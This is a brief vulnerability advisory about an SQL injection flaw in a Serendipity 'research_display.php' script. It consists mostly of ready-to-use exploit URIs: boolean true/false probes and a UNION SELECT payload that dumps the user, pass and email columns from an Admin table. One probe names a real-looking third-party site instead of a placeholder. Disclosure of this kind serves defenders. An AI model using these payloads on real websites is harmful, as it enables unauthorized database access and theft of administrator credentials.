Serendipity 'research_display.php' SQL Injection Vulnerability

Serendipity 'research_display.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/research_display.php?ID=47 and 1=1 //\\ http://www.aarda.org/research_display.php?ID=47 and 1=2

http://www.example.com/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,group_concat%28user,0x3a,pass,0x3a,email%29,null,null,null+FROM+Admin